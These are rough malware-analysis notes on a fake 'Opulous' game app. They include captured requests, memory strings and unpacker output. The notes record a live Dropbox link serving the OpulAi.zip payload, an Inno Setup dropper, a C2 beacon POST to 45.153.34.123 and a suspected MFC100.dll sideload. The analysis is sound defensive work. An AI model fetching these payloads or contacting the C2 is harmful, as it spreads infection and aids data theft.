This is just a page of rough notes I'm taking as I go through Opulous analysis from https://x.com/sta5i/status/1962591346407154110
POST https://glitch.footballismy[.]life/api/4/envelope/ HTTP/1.1
x-sentry-auth: Sentry sentry_key=71878a140ea8482c86abc998e4ca02bb, sentry_version=7, sentry_timestamp=1757078735.0221975, sentry_client=sentry.rust/0.42.0
accept: */*
host: glitch.footballismy[.]life
content-length: 13132

sdk":{"name":"sentry.rust","version":"0.42.0","integrations":["attach-stacktrace","debug-images","contexts","panic","process-stacktrace"],"packages":[{"name":"cargo:sentry","version":"0.42.0"}]}}
POST http://ipc.localhost/loadData HTTP/1.1
Host: ipc.localhost
Proxy-Connection: keep-alive
Content-Length: 2
sec-ch-ua-platform: "Windows"
sec-ch-ua: "Chromium";v="139", "Microsoft Edge WebView2";v="139", "Microsoft Edge";v="139", "Not;A=Brand";v="99"
sec-ch-ua-mobile: ?0
tauri-invoke-key: fXKt:B2Ws>9ik%<8c
[Rest of this capture garbled; hostnames that survive: api.ipify.org, ash-speed.hetzner.com, glitchtip.com, tauri.localhost]
msedgewebview2 \AppData\Local\con.app.opulous\EBWebView NOTES
0x43fc01ac1440 (23): http://tauri.localhost/
0x43fc01ac1480 (35): http://ipc.localhost/download_files
http://ipc.localhost/plugin%3Ahttp%7Cfetch_send
http://ipc.localhost/plugin%3Ahttp%7Cfetch_send
0x43fc0193f218 (29): http://ipc.localhost/loadData
0x43fc01791db0 (47): http://tauri.localhost/assets/index-ZElHxHms.js
0x43fc01790180 (172): Uncaught (in promise) error sending request for url (https://opulousapp.com/files.php)
0x43fc014be166 (47): http://tauri.localhost/assets/index-CndO1qb_.js
0x43fc007d1680 (101): "Chromium";v="139", "Microsoft Edge WebView2";v="139", "Microsoft Edge";v="139", "Not;A=Brand";v="99"
0x43fc007d1840 (88): embedded_browser.mojom.EmbeddedBrowserWebViewHandler [primary] PipeControlMessageHandler
0x43fc0143d3bd (43): https://opulousapp.com/events.php?type=game
0x43fc0060b770 (196): Uncaught (in promise) error sending request for url (https://opulousapp.com/events.php?type=login)
0x43fc00605520 (192): C:\Program Files (x86)\Microsoft\EdgeWebView\Application\139.0.3405.125\resources\edge_clipboard
0x66600002c126 (56): --embedded-browser-webview=1
0x66600002c160 (60): --webview-exe-name=opulous.exe
0x66600002c19e (54): --webview-exe-version=0.1.0
0x66600002c1d6 (140): --user-data-dir=C:\Users\drago\AppData\Local\con.app.opulous\EBWebView
0x66600002c264 (28): --noerrdialogs
0x66600002c282 (84): --embedded-browser-webview-dpi-awareness=2
opulous.exe NOTES
0x220001494d4 (254): {"clientConfig":{"method":"PUT","url":"https://opulousapp.com/events.php?type=game","headers":[["content-type","application/json"]],"data":[123,34,97,112,112,34,58,34,79,80,34,44,34,101,118,101,110,116,34,58,34,108,97,117,110,99,104,34,125]}}khasPostData
The "data" byte array DECODES to {"app":"OP","event":"launch"}
gamefiles.pak
0x2200013ca43 (437): eta charset="UTF-8" />
Tauri + React + Typescript
0x220000dc60e (77): :_sers\\xxxx\\AppData\\Local\\Temp\\kGqJVu6VvtoO","fileName":"NAJKQGZY.exe"}
0x220000e837e (158): {/KQGZY","fileName":"NAJKQGZY.exe","route":"https://www.dropbox.com/scl/fi/pxa8akdp3fffmuufrvp8f/OpulAi.zip?rlkey=7hpt86dl8ie45cmf2uoonaw40&st=5m3ogubi&dl=1"}
0x22000069838 (47): 70,103,70,69,69,112,108,0]).buffer, index: 0 })
0x22000069c10 (855): NTERNALS__.runCallback(4202606803, { message: new Uint8Array([97,48,111,98,83,86,70,69,81,107,86,67,82,65,69,87,68,65,57,53,100,51,78,52,102,67,89,55,89,82,69,66,81,49,78,97,88,81,78,51,87,81,104,82,69,65,48,97,102,110,66,122,99,109,70,119,97,50,115,68,85,120,49,82,70,65,69,86,82,70,90,71,87,81,82,68,65,104,70,70,70,85,70,68,81,108,120,108,70,122,107,98,82,85,66,80,72,108,86,76,86,107,66,86,88,107,111,68,86,81,112,90,97,103,74,69,86,86,86,118,65,103,99,73,90,66,120,100,71,86,81,76,85,65,49,100,83,70,90,83,86,70,70,86,82,85,82,102,83,48,90,72,67,86,82,120,71,83,112,69,81,48,70,50,88,120,100,74,82,66,70,101,83,108,57,71,66,69,119,79,66,103,53,74,84,70,48,67,86,108,115,65,87,86,81,78,68,70,78,97,86,119,66,89,87,81,112,97,86,49,111,68,66,104,57,65,87,86,120,85,86,81,66,67,66,107,66,82,87,69,66,100,86,70,103,70,69,69,112,108,0]).buffer, index: 0 })
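Added example (not part of the original notes, and not code from the sample): a Python triage helper that pulls the numeric byte arrays out of memory strings like the ones above and reports whether each holds JSON, base64 text, plain text or binary. The function names are made up here, and the second sample line is shortened to the first eight bytes of the runCallback array plus its NUL terminator.

```python
import base64
import json
import re

# Runs of 8+ comma-separated decimal values inside [...], as seen in the
# "data":[...] and new Uint8Array([...]) strings in the dump.
BYTE_ARRAY = re.compile(r"\[((?:\d{1,3},){7,}\d{1,3})\]")

def classify(raw: bytes):
    """Return (kind, text); kind is json, base64, text or binary."""
    raw = raw.rstrip(b"\x00")            # runCallback buffers end in a NUL
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return "binary", raw.hex()
    if text.startswith(("{", "[")):
        try:
            json.loads(text)
            return "json", text
        except ValueError:
            pass
    if text and len(text) % 4 == 0:
        try:
            base64.b64decode(text, validate=True)
            return "base64", text        # another encoding layer sits below
        except ValueError:
            pass
    return "text", text

def decode_byte_arrays(dump: str):
    """Find every numeric byte array in a strings dump and decode it."""
    results = []
    for m in BYTE_ARRAY.finditer(dump):
        values = [int(v) for v in m.group(1).split(",")]
        if all(v <= 255 for v in values):
            results.append(classify(bytes(values)))
    return results

# Sample input: the events.php "data" array and a shortened runCallback array.
SAMPLE = (
    '"data":[123,34,97,112,112,34,58,34,79,80,34,44,34,101,118,101,110,116,'
    '34,58,34,108,97,117,110,99,104,34,125]}}\n'
    'runCallback(4202606803, { message: new Uint8Array('
    '[97,48,111,98,83,86,70,69,0]).buffer, index: 0 })'
)

if __name__ == "__main__":
    for kind, text in decode_byte_arrays(SAMPLE):
        print(f"{kind:7} {text}")
```

A "base64" result only means the bytes are base64 text; what sits underneath still has to be worked out separately.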
OpulAi.zip Files dropped:
opulous.exe NOTES
NAJKQGZY Notes
.\innounp.exe -x -m ..\opulous_10.71.2_x64-setup\NAJKQGZY.exe
innounp - the Inno Setup Unpacker, Version 2.65.1 (8/25/2025)
Inno Setup archive: NAJKQGZY.exe
Inno Setup version detected: 6.4.3 (Unicode)
#1 {tmp}\Debu-Inje.exe - extracted
#2 {tmp}\Heatdrung.gp - extracted
#3 {tmp}\Meershing.mcj - extracted
#4 {tmp}\mfc100.dll - extracted
#5 {tmp}\MSVCR100.dll - extracted
#6 {tmp}\RecZip.dll - extracted
#7 embedded\CompiledCode.bin - extracted
#8 embedded\WizardImage0.bmp - extracted
#9 embedded\WizardSmallImage0.bmp - extracted
#10 embedded\default.isl - extracted
#11 install_script.iss - extracted
Debu-Inje.exe
http://45.153.34.123/b0481cf5ba1844ec.php
POST http://45.153.34.123/b0481cf5ba1844ec.php HTTP/1.1
Content-Type: application/json
Host: 45.153.34.123
Content-Length: 136
Proxy-Connection: Keep-Alive
Pragma: no-cache
B3wZFttw+0AhRgUE2+NZrJ+U6htQbLM249o7O0L7XGevjgtEQtJuGTkOjTHf4HtdOuFkHpdwFjaLgvQYcewvqeGHoJ1tEFMPGcEqt9wnfSWFCIUhNqVOECabuKg0l3xiq09KEg
closes, and launches etnavigator128.exe
AppData\Roaming\Syncserver_v4\ (chime setup dd65b976d1865ba6c2368fcf9c9eb223)
Debu-Inje.exe appears to be chime setup, but likely with a DLL sideload of MFC100.DLL (218e1f37b36fcebfccc08ad2c021777b)